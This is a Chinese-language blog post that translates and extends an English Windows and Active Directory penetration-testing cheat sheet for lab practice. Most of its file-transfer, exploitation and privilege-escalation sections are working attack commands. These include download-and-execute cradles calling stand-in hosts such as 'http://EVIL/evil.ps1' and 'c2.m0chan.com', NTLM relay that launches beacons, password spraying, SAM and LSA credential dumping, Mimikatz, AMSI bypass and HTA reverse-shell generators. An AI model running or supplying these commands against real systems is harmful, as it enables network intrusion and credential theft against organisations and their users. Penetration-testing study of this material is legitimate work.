Windows 命令备忘笔记集合-hacktoday.net-2020.12.01版本

笔记说明：

该笔记是国外 hacktoday.net 论坛上的一篇笔记文章，我整体翻译了注释的内容，并根据个人打靶学习情况，增加或删除了一部分内容，至此放置博客上留作后续复习使用，以及方便各位浏览到我博客的安全爱好者参考使用。

一、Windows 基础信息枚举

账号及用户组信息枚举

net users # 当前用户列表信息
net users /domain  # 当前域内用户列表信息
net localgroup # 本地组列表信息
net groups /domain # 域用户组列表信息
net groups /domain "Domain Admins" # 域管理员组列表信息

Get-ADUser
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -identity "Domain Admins" -Domain m0chanAD.local -DomainController 10.10.14.10
Find-DomainShare


# 主机发现
netdiscover -r subnet/24
nbtscan -r [range]
for /L %i in (1,1,255) do  @ping.exe -n 1 -w 50 <10.10.10>.%i | findstr TTL


# 反向DNS查找
$ComputerIPAddress = "10.10.14.14"
[System.Net.Dns]::GetHostEntry($ComputerIPAddress).HostName

使用 SPN 的用户

# https://github.com/tevora-threat/SharpView

Get-DomainUser -SPN

Get-ADComputer -filter {ServicePrincipalName -like <keyword>} -Properties OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack,
PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation

批量 Kerberos 主机枚举

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

进攻型 CSharp Scripts 枚举

# https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts

LDAPUtility.cs

Usage: ldaputility.exe options domain [arguments]

ldaputility.exe DumpAllUsers m0chan
ldaputility.exe DumpUser m0chan mr.un1k0d3r
ldaputility.exe DumpUsersEmail m0chan
ldaputility.exe DumpAllComputers m0chan 
ldaputility.exe DumpComputer m0chan DC01
ldaputility.exe DumpAllGroups m0chan
ldaputility.exe DumpGroup m0chan "Domain Admins"
ldaputility.exe DumpPasswordPolicy m0chan

还有用于WMI调用的WMIUtility.cs和用于原始LDAP查询的LDAPQuery.cs。
有关详细信息，请参阅上面链接的github。

AD域基础手动信息枚举

nltest /DCLIST:DomainName  # 查找主域名，DomainName 是需要输入当前域名的参数
nltest /DCNAME:DomainName  # 查看域中主DC的名字
nltest /DSGETDC:DomainName # 查询域控主机名

# 获取当前域信息-类似于获取域
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# 获取域信任信息-类似于获取域信任
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# 查看域信息
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

#  查看域信任信息
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

nltest [server:<fqdn_foreign_domain>] /domain_trusts /all_trusts /v

nltest /dsgetfti:<domain>

nltest /server:<ip_dc> /domain_trusts /all_trusts

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# 查看所有域控制器
nltest /dclist:offense.local
net group "domain controllers" /domain

# 查看当前会话的DC
nltest /dsgetdc:m0chanAD.local

# 从CMD查看域信任
nltest /domain_trusts

# 从CMD查看用户信息
nltest /user:"m0chan"

# 获取通过身份验证的用户的域名和DC
klist

# 获取所有登录的会话，包括NTLM和Kerberos
klist sessions

# 查看 Kerb 票据
klist

# 查看缓存的Krbtgt
klist tgt

# 旧Windows系统上的whoami
set u

# 列出域内所有用户名
([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname

# 列出域内管理员

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

# 列出有关特定用户的所有信息

([adsisearcher]"(&(objectClass=User)(samaccountname=<username>))").FindAll().Properties

# 查看设置了描述字段的所有用户

([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description 

基于Linux域环境中的AD工具枚举

# https://github.com/jasonwbarnett/linux-adtool

tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install

> adtool list ou=user,dc=example,dc=com
CN=allusers,OU=user,DC=example,DC=com
OU=finance,OU=user,DC=example,DC=com
OU=administration,OU=user,DC=example,DC=com

> adtool oucreate marketing ou=user,dc=example,dc=com
> adtool useradd jsmith ou=marketing,ou=user,dc=example,dc=com
> adtool setpass jsmith banana
> adtool unlock jsmith
> adtool groupadd allusers jsmith
> adtool attributereplace jsmith telephonenumber 123
> adtool attributereplace jsmith mail jsmith@example.com

SharpView 工具枚举参数

# https://github.com/tevora-threat/SharpView

Get-DomainFileServer
Get-DomainGPOUserLocalGroupMapping
Find-GPOLocation
Get-DomainGPOComputerLocalGroupMapping
Find-GPOComputerAdmin
Get-DomainObjectAcl
Get-ObjectAcl
Add-DomainObjectAcl
Add-ObjectAcl
Remove-DomainObjectAcl
Get-RegLoggedOn
Get-LoggedOnLocal
Get-NetRDPSession
Test-AdminAccess
Invoke-CheckLocalAdminAccess
Get-WMIProcess
Get-NetProcess
Get-WMIRegProxy
Get-Proxy
Get-WMIRegLastLoggedOn
Get-LastLoggedOn
Get-WMIRegCachedRDPConnection
Get-CachedRDPConnection
Get-WMIRegMountedDrive
Get-RegistryMountedDrive
Find-InterestingDomainAcl
Invoke-ACLScanner
Get-NetShare
Get-NetLoggedon

SMB服务枚举命令集合

nmap -p 139,445 --script smb.nse,smb-enum-shares,smbls
enum4linux 1.3.3.7
smbmap -H 1.3.3.7
smbclient -L \\INSERTIPADDRESS
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
nbtscan [SUBNET]


#Check for SMB Signing
nmap --script smb-security-mode.nse -p 445 10.10.14.14

SNMP服务枚举命令集合

snmpwalk -c public -v1 10.10.14.14
snmpcheck -t 10.10.14.14 -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 10.10.14.14 -oG snmp_results.txt
snmpenum -t 10.10.14.14

MySQL服务枚举命令

nmap -sV -Pn -vv  10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

DNS区域传输枚举

dig axfr blah.com @ns1.m0chan.com
nslookup -> set type=any -> ls -d m0chan.com
dnsrecon -d m0chan -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

LDAP服务枚举

ldapsearch -H ldap://<ip>
ldapwhoami

RPC服务枚举

rpcclient -U "10.10.14.14"
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser <user>
lsaquery
lookupnames Guest
lookupnames Administrator

远程登录Windows桌面

rdesktop -u guest -p guest INSERTIPADDRESS -g 94%

# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS

二、Windows 下的文件传输命令

TFTP 服务文件传输

m0chan Machine
mkdir tftp
atftpd --deamon --port 69 tftp
cp *file* tftp
On victim machine:
tftp -i <[IP]> GET <[FILE]>

FTP 服务文件传输

echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

VBS Script 文件传输

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs



cscript wget.vbs <url> <out_file>

Use echoup function on pentest.ws to generate echo commands.
https://pentest.ws/features

Powershell 文件传输

# https://github.com/danielbohannon/Invoke-CradleCrafter 
# Use this to craft obsufacted cradles

Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"

(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") 

# Powershell下载到内存

IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')

# 带代理的Powershell

$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('https://server/script.ps1'));

Powershell Base64 文件传输

$fileName = "Passwords.kdbx"
$fileContent = get-content $fileName
$fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | set-content ($fileName + ".b64")

隧道复制文件传输 / pscp.exe

pscp.exe C:\Users\Public\m0chan.txt user@target:/tmp/m0chan.txt
pscp.exe user@target:/home/user/m0chan.txt C:\Users\Public\m0chan.txt

BitsAdmin.exe 工具文件传输

cmd.exe /c "bitsadmin.exe /transfer downld_job /download /priority high http://c2.m0chan.com C:\Temp\mimikatz.exe & start C:\Temp\binary.exe"

Remote Desktop 文件传输

rdesktop 10.10.10.10 -r disk:linux='/home/user/filetransferout'

WindowsHTTP服务COM组件方式文件传输

[System.Net.WebRequest]::DefaultWebProxy
[System.Net.CredentialCache]::DefaultNetworkCredentials
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

CertUtil.exe 工具文件传输

# File Transfer

certutil.exe -urlcache -split -f https://m0chan:8888/filename outputfilename

# CertUtil Base64 Transfers

certutil.exe -encode inputFileName encodedOutputFileName
certutil.exe -decode encodedInputFileName decodedOutputFileName

Curl (Windows 1803+) 文件传输

curl http://server/file -o file
curl http://server/file.bat | cmd

IEX(curl http://server/script.ps1);Invoke-Blah

SMB 服务文件传输

python smbserver.py Share `pwd` -u m0chan -p m0chan --smb-2support

三、Windows 下的漏洞利用攻击集合

使用MSHTA执行代码

mshta.exe 是所有版本的Windows上提供的默认二进制文件，允许执行.hta有效载荷

mshta.exe https://m0chan.com/exploit.hta

LLMNR / NBT-NS 欺骗攻击

# 盗取信用的响应者

git clone https://github.com/SpiderLabs/Responder.git python Responder.py -i local-ip -I eth0


LLMNR和NBT-NS通常默认打开，目的是充当DNS的后备。
i/e如果您搜索\\HRServer\但它不存在，Windows（默认情况下）将通过网络发送LLMNR广播。
通过使用Responder，我们可以响应这些广播，并说出以下内容 “是的，我是HRServer，向我进行身份验证，我会得到一个可以破解或转发的NTLMv2哈希。

Responder WPAD 攻击

responder -I eth0 wpad

默认情况下，Windows配置为在使用internet时搜索Web代理自动发现文件 
转到internet explorer并搜索谷歌，它会自动搜索WPAD文件。。。 
然后采取NTLMv2哈希和NTLM中继它或发送到破解钻机。

mitm6 攻击 - 用IPv6攻陷IPv4网络

# 当WPAD攻击不起作用时使用，这将使用IPv6和DNS将信誉中继到目标。

By default IPV6 should be enabled. 
git clone https://github.com/fox-it/mitm6.git 
cd /opt/tools/mitm6
pip install .

mitm6 -d m0chanAD.local

现在漏洞发生了，Windows更喜欢IPV6而不是IPv4，这意味着DNS=由攻击者控制。

ntlmrelayx.py -wh webserverhostingwpad:80 -t smb://TARGETIP/ -i

-i opens an interactive shell.

Shout out to hausec for this super nice tip.

SCF文件攻击

创建.scf文件并放入SMB共享并启动响应程序；）


Filename = @m0chan.scf

[Shell]
Command=2
IconFile=\\10.10.14.2\Share\test.ico
[Taskbar]
Command=ToggleDesktop

NTLM 中继攻击

解释NTLM/Net-NTLMV1和V2之间差异的好文章

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

TL；DR NTLMv1/v2是Net-NTLMv1/v2的简写，因此是相同的。

您可以使用NTLM哈希执行Pass The Hash攻击。 
您不能使用Net NTLM哈希执行Pass The Hash攻击。

PS：你不能将散列转发回它自己。 
PS:必须禁用SMB签名才能缓解这种情况，您可以使用nmap扫描或crackmapexec进行检查

crackmapexec smb 10.10.14.0/24 --gene-relay-list targets.txt

这将告诉您子网中未启用SMB签名的主机的列表。

python Responder.py -I <interface> -r -d -w
ntlmrelayx.py -tf targets.txt (默认情况下，这将转储目标的本地SAM，不是很有用吗？)

不如我们执行一个命令。

ntlmrelayx.py -tf targets.txt -c powershell.exe -Enc asdasdasdasd
ntlmrelayx.py -tf targets.txt -c powershell.exe /c download and execute beacon... = RIP

Priv Exchange 漏洞攻击

# https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Combine privxchange.py and ntlmrelayx

ntlmrelayx.py -t ldap://DOMAINCONTROLLER.m0chanAD.local --escalate-user TARGETUSERTOESCALATE

python privexchange.py -ah FDQN.m0chanAD.local DOMAINCONTROLLER.m0chanAD.local -u TARGETUSERTOESCALATE -d m0chanAD.local

Exchange 密码喷洒攻击

# https://github.com/dafthack/MailSniper.git

Invoke-PasswordSprayOWA -ExchHostname EXCH2012.m0chanAD.local -UserList .\users.txt -Password Winter2019


# https://github.com/sensepost/ruler

./ruler-linux64 -domain mc0hanAD.local --insecure brute --userpass userpass.txt -v

ExchangeRelayX - Exchange 中继 / 重放脚本 攻击

# https://github.com/quickbreach/ExchangeRelayX

用于内部部署交换服务器的到EWS端点的NTLM中继工具。为黑客提供OWA。

./exchangeRelayx.py -t https://mail.quickbreach.com

Exchange邮箱邮件泄露攻击

# https://github.com/dafthack/MailSniper.git

Enumerate GlobalAddressList

Get-GlobalAddressList -ExchHostname EXCH2012.m0chanAD.local -Username jamie@m0chanAD.local -Password Winter2019

Enumerate AD Usernames

Get-ADUsernameFromEWS -Emaillist .\users.txt

Enumerate Mailbox Folders

Get-MailboxFolders -Mailbox jamie@m0chanAD.local

Enumerate Passwords & Credentials Stored in Emails

Invoke-SelfSearch -Mailbox jamie@m0chanAD.local

Enumerate Passwords & Credentials (Any Users) Requires DA or Exchange Admin

Invoke-GlobalMailSearch -ImpersonationAccount helenHR -ExchHostname Exch2012

CrackMapExec 工具利用攻击

CrackMapExec安装在Kali上或从Github获取Windows二进制文件。

Has 3 Execution Methods
crackmapexec smb <- 通过SMB创建和运行服务
crackmapexec wmi <- 通过WMI执行命令
crackmapexec at <- 使用任务调度器调度任务

可以使用-X标志i/e执行普通命令

crcakmapexec smb 10.10.14.0/24 -x whoami

crcakmapexec smb 10.10.14.0/24 <- Host Discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' 
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares


也可以PTH与CME

crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e

cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth --shares 


-- 本地身份验证用于与本地管理员进行身份验证，如果Organisaton通过网络使用相同的本地管理员哈希而不使用LAPS，则效果良好

转储本地SAM哈希

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth --sam

运行 Mimikatz ：

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz

^ 噪音很大，但是的，你可以在整个网络范围内运行mimikatz。RIP域管理员

枚举杀软产品：

crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M enum_avproducts

Mail 喷洒攻击

Invoke-PasswordSprayOWA -ExchHostname m0chanAD.local -userlist harvestedUsers.txt -password Summer2019

[*] Now spraying the OWA portal at https://m0chanAD.local/owa/

[*] SUCCESS! User:m0chan:Summer2019

Lmao，你真的认为我会使用2019年夏季通行证吗？

使用PowerShell读取Exchange电子邮件

$outlook = New-Object -ComObject outlook.application
$olFolders ="Microsoft.Office.Interop.Outlook.OlDefaultFolders" -as [type]
$namespace = $Outlook.GetNameSpace("MAPI")
$inbox = $namespace.GetDefaultFolder($olFolders::olFolderInbox)
$inbox.items.count
$inbox.items
$inbox.items.GetLast()

Kerberos 攻击内容参考链接

# https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
# https://m0chan.github.io/Kerberos-Attacks-In-Depth

MSSQL利用漏洞（PowerUpSQL）

# https://github.com/NetSPI/PowerUpSQL

# View SQL Instances
Get-SQLInstanceDomain [| Get-SQLServerInfo]

# Login in with Domain Account
Get-SQLConnectionTestThreaded

# Login in with Default Password
Get-SQLServerDefaultLoginPw

# List DB, Tables & Columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

# Search Column Names for Word

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

# Try to Execute Commands (RCE)

Invoke-SQLOSCmd


#Enable XP_CMDShell Process

EXEC sp_configure 'show advanced options', 1;  
go  
RECONFIGURE;  
go  
EXEC sp_configure 'xp_cmdshell', 1;  
go  
RECONFIGURE;  
go  
xp_cmdshell '<cmd>'
go

带有MSBuild的恶意宏

# https://github.com/infosecn1nja/MaliciousMacroMSBuild

# https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ - MSBuild Explained

Shellcode MSBuild VBA宏的创建：
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba

创建PowerShell MSBuild VBA宏：
python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba

创建自定义MSBuild VBA宏：
python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba

创建具有终止日期的Shellcode MSBuild VBA宏：
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018

使用环境键控创建Shellcode MSBuild VBA宏：
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github

ClickOnce MSBuild 负载

# https://github.com/hausec/MaliciousClickOnceMSBuild

1） 创建一个新的。Visual Studio中的NET Framework控制台项目 
2） 从此存储库导入程序.cs 
3） 将MSBuild负载文件添加到项目 
4） 发布项目

怪异HTA-无法检测的HTA

# https://github.com/felamos/weirdhta

python3 --help
python3 weirdhta.py 10.10.10.10 4444 --normal (for normal powershell reverse_shell)
python3 weirdhta.py 10.10.10.10 4444 --smb (without powershell payload, it will use smb)
python3 weirdhta.py 10.10.10.10 4444 --powercat (for powercat)
python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe' (custom command)

EvilWinRM 工具帮助信息

# https://github.com/Hackplayers/evil-winrm

Ultimate Shell for WinRM Connections

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ]
    -S, --ssl                        Enable SSL
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required)
    -p, --password PASS              Password
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -h, --help                       Display this help message

GetVulnerableGPO 工具

# https://github.com/gpoguy/GetVulnerableGPO

PowerShell脚本，用于查找应强化的“易受攻击”的安全相关GPO（有关更多背景信息，请参阅此博客的GPO可发现性部分：https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/)需要GPMC和SDM软件GPMC PowerShell模块（用于在搜索过程中更容易地解析GP设置）：https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip

Invoke-PSImage 工具

# https://github.com/peewpw/Invoke-PSImage

以PNG文件的像素对PowerShell脚本进行编码，并生成要执行的oneliner

InvokePSImage获取PowerShell脚本，并将脚本的字节编码为PNG图像的像素。它生成一个oneliner，用于从文件或从web执行。

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
   [Oneliner to execute from a file]
   
   
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
   [Oneliner to execute from the web]

Meterpeter+Donut-外壳代码注入 .NET

# https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html

一个用于在Meterpeter中执行任意外壳代码的模块，也就是在内存中执行Mimikatz，反射式和交互式！

donut -f /tmp/mimikatz.exe -a 2 -o /tmp/payload.bin

use post/windows/manage/shellcode_inject
set SHELLCODE /tmp/payload.bin
set SESSION 1
run

DemiGuise - 加密HTA

# https://github.com/nccgroup/demiguise

运行demiguise.py文件，为其提供加密密钥、有效负载类型、输出文件名和您希望运行HTA的命令。

Example: python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o

由于该工具输出的是一个包含JavaScript的HTML文件，因此您可以简单地使用此JS并将其托管在任何您喜欢的地方。这意味着，如果您的客户端网站容易受到反射XSS的攻击，您可以使用它从他们（高度信任）的域中提供您的HTA文件。

此外，Outlook默认情况下不会阻止.html附件，其他一些应用程序也不会阻止-发挥你的想象力！：）

Grouper2 工具

# https://github.com/l0ss/Grouper2

查找AD组策略中的漏洞

Grouper2是Pentester的一个工具，用于帮助查找Active Directory组策略中与安全相关的错误配置。

Microsoft SQL 攻击内容参考链接

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

CrackMapExec 常用命令

# https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/

Command Execution - CMD.exe

crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

Command Execution - Powershell.exe

crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami

Check For Logged in Users

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --lusers

Using Local Auth

crackmapexec 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth

Enumerating Shares

crackmapexec 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth --shares

WDigest Enable/Disable

“这允许我们重新启用WDigest提供程序并从LSA内存转储明文凭据”

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest disable

Password Policy

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS --pass-pol

RID Bruteforcing

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS --rid-brute

Top Credential Attacks

crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam

Pass Hash Subnet

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaa35b51404ee:5509de4fa6e8d9f4a61100e51' --local-auth

Null Sessions

crackmapexec smb <target(s)> -u '' -p ''


Modules - Enum_Chrome

sudo cme 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M enum_chrome

Modules - Enum_AV

sudo cme 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -m enum_avproducts

SharePoint 工具参考链接内容

https://www.crummie5.club/the-lone-sharepoint/

IIS 服务参考内容链接

https://drive.google.com/file/d/1O0IARjqP4Pwa-ae1nAP8Nr9qb0ai2XPu/view

一切你需要的黑客IIS，最近的谈话从Shubs

简易ASMI旁路（AMSI失败）

1. 打开powershell，获取一个独特的AMSI旁路 from: https://amsi.fail/

2. 从以下位置获取您喜爱的C#程序集：https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/这些只是标准的C#可执行文件，但在powershell包装器中进行反射。

3. 在本地托管这些并通过执行 IEX (New-Object net.webclient).downloadstring("http://x.x.x.x./Invoke-Seatbelt.ps1")

四、Windows 权限提升命令集合

Basics提权信息搜集

systeminfo
wmic qfe
net users
hostname
whoami
net localgroups
echo %logonserver%
netsh firewall show state
netsh firewall show config
netstat -an
type C:\Windows\system32\drivers\etc\hosts

PowerUp.ps1 工具提权

powershell.exe /c IEX(New-Object Net.WebClient).downloadString('webserver/PowerUp.ps1') ;Invoke-AllChecks

SharpUp 工具提权

# https://github.com/GhostPack/SharpUp

C可以反射加载的PowerUp.ps1的Sharp实现。

如果是AD环境，那就使用 Bloodhound进行枚举

SharpHound.ps1
SharpHound.exe -> https://github.com/BloodHoundAD/SharpHound

IEX(System.Net.WebClient.DownloadString('http://webserver:4444/SharpHound.ps1'))

Invoke-CollectionMethod All

Import .zip to Bloodhound

如果你不能解开拉链。。。想办法；）我开玩笑，我开玩笑。输出为纯json并手动复制。这是一个很大的痛苦，但它是有效的。

Bloodhound-Python 工具枚举信息

git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .

bloodhound-python -d m0chanAD.local -u m0chan -p Summer2019 -gc DOMAINCONTROLLER.m0chanAD.local -c all

注册表明文密码查看

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

查看已安装的软件

tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime

Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

弱文件夹权限提权

程序文件夹上“所有人”的完全权限

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 

修改程序文件夹中每个人的权限

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 

计划的任务查询

schtasks /query /fo LIST /v

Powershell 历史命令查询

type C:\Users\m0chan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

查看连接的驱动器

net use
wmic logicaldisk get caption,description

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

查看当前用户权限信息

whoami /priv

查找SeImpersonate、SeDebugPrivilege等

是否有其他人登录？

qwinsta

查看注册表自动登录

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

在凭据管理器中查看存储的凭据

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

查看未加括号的服务路径

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

查看启动项目

wmic startup get caption,command
